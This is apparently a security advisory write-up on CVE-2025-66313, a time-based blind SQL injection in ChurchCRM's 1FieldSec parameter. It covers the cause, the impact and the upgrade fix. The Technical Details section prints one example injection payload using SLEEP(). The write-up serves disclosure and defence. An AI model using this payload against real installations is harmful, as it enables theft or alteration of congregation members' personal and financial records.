CVE-2025-66313: Critical Blind SQL Injection Found in ChurchCRM!

Overview

CVE-2025-66313 identifies a time-based blind SQL injection vulnerability present in ChurchCRM, an open-source church management system. This vulnerability affects versions 6.2.0 and earlier. The vulnerability resides in the handling of the 1FieldSec parameter. An attacker can inject SQL code, specifically utilizing the SLEEP() function, to induce deterministic server-side delays. This confirms that the provided value is being incorporated directly into a SQL query without proper parameterization or sanitization.

Technical Details

The root cause of this vulnerability is the improper handling of user-supplied input within the ChurchCRM application. Specifically, the 1FieldSec parameter is vulnerable. By injecting SQL code into this parameter, an attacker can manipulate database queries. The time-based blind SQL injection leverages the SLEEP() function to observe the server’s response time. If the injected SLEEP() command executes, a noticeable delay will occur, confirming the successful injection. This allows attackers to infer information about the database structure and content, even without directly seeing the query results.

For example, a malicious user might craft a request containing a payload similar to: 1FieldSec=1' AND SLEEP(5) -- . If the server pauses for 5 seconds, the injection is successful.

CVSS Analysis

The CVSS score and severity level for CVE-2025-66313 are currently marked as N/A. This may be because the CVSS score has not yet been fully calculated and released. However, given that this is a blind SQL injection vulnerability that could lead to data exfiltration and modification, it is likely to be rated as High or Critical once the CVSS score is determined. The blind nature of the injection makes it slightly harder to exploit, but its potential impact remains significant.

Possible Impact

Successful exploitation of this vulnerability can lead to severe consequences, including:

• Data Exfiltration: Sensitive information such as member details (names, addresses, contact information, financial records) could be extracted from the database.
• Data Modification: Attackers could alter existing data, potentially leading to unauthorized changes in membership records, financial contributions, or other critical information.
• Account Takeover: By manipulating database records, attackers could potentially gain unauthorized access to administrator accounts.
• Service Disruption: In some cases, attackers could inject code that disrupts the normal operation of the ChurchCRM system.

Mitigation or Patch Steps

The recommended mitigation is to upgrade to the latest version of ChurchCRM, which incorporates the fix for this vulnerability. The fix is available in the commit referenced below. Specifically:

• Upgrade ChurchCRM: Ensure you are running the latest version of ChurchCRM to benefit from the patch that addresses this vulnerability.

References

• ChurchCRM Commit (Fix): github.com/ChurchCRM/CRM/commit/719a6bc73245c40e3c30dae6229daaecd451e59f
• GitHub Security Advisory: github.com/ChurchCRM/CRM/security/advisories/GHSA-47q3-c874-mqvp